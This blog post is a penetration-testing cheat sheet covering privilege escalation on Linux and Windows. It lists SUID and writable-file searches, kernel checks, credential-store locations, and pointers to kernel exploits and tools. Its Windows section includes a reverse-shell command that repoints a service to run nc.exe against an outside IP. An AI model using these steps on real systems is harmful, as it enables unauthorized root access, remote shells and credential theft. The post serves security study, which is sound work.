IT VN

Information Technology | Softwares - Graphics - Programming - Hacking - Security

Apr 12, 2020

Home » , , » Tips and Cheat Sheet useful for Privilege Escalation

Tips and Cheat Sheet useful for Privilege Escalation


Linux:
Sudo Rights, we can find files as root in the user’s shell with:
$ sudo -l
Get shell: /bin/bash -i
with file as root in user, we can add that line in file then run. We will open the root shell

 Find anything with SUID / SGID permission:
$ find / -perm -4000 -ls 2>/dev/null
$ find / -user root -perm -4000 2>/dev/null
$ find / -perm -2000 2>/dev/null

 Writeable folders
$ find / -writable -type d 2>/dev/null
$ find / -perm -222 -type d 2>/dev/null
$ find / -perm -o w -type d 2>/dev/null

 Find any writable file owned by root:
$ find / -perm -002 -user root -type f -not-path “/proc/*” 2>/dev/null

 Identify the kernel version and distribution:
$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release
Use "sendpage" and "dirtycow" both kernel exploits to do privilege escalation

 GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions:
https://gtfobins.github.io

 There are some tool to auto find signature can exploitable in victim machine like: LinEnum, Pspy, LinPEAS
https://github.com/rebootuser/LinEnum
https://github.com/DominicBreuker/pspy
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Windows:

 Check services with write access:
> accesschk -a *
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Service exploit E.g:
Reconfig service with exploit command or reverse shell:
> sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe"
Then restart service:
> sc.exe stop <service name>
> sc.exe start <service name>

 Permissions on specific folders:
> icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
> icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

 Look for backups files SAM.bak.

 Check Credentials mananger:
> dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ cmdkey /list
> dir C:\Users\username\AppData\Local\Microsoft\Credentials\

 What tokens we have 
> whoami /priv

 What we can access?
> whoami /groups

 Some useful tool:
https://github.com/Hackplayers/PsCabesha-tools

 updating...

 Most of PrivEsc way is find signature/version then go to find the way to exploit like CVE or at https://www.exploit-db.com/

 READ MORE: 
Windows pentest cheat sheet
Useful Pentest cheat sheet/tools
Share:

About Us

IT